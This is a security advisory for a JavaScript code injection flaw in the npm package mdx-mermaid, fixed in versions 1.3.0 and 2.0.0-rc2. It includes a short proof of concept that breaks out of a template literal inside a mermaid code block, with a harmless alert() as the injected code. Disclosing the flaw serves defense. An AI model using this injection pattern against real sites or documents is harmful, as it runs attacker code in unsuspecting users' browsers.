GHSA-rvgm-35jw-q628

Suggest an improvement
Source
https://github.com/advisories/GHSA-rvgm-35jw-q628
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-rvgm-35jw-q628/GHSA-rvgm-35jw-q628.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-rvgm-35jw-q628
Aliases
Related
Published
2022-08-31T22:26:11Z
Modified
2023-11-08T04:09:58.603883Z
Severity
  • 3.6 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N CVSS Calculator
Summary
Improper Control of Generation of Code ('Code Injection') in mdx-mermaid
Details

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

Database specific
{
    "nvd_published_at": "2022-08-29T18:15:00Z",
    "github_reviewed_at": "2022-08-31T22:26:11Z",
    "severity": "LOW",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}
References

Affected packages

npm / mdx-mermaid

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.3.0

npm / mdx-mermaid

Package

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0-rc1
Fixed
2.0.0-rc2

Affected versions

2.*

2.0.0-rc1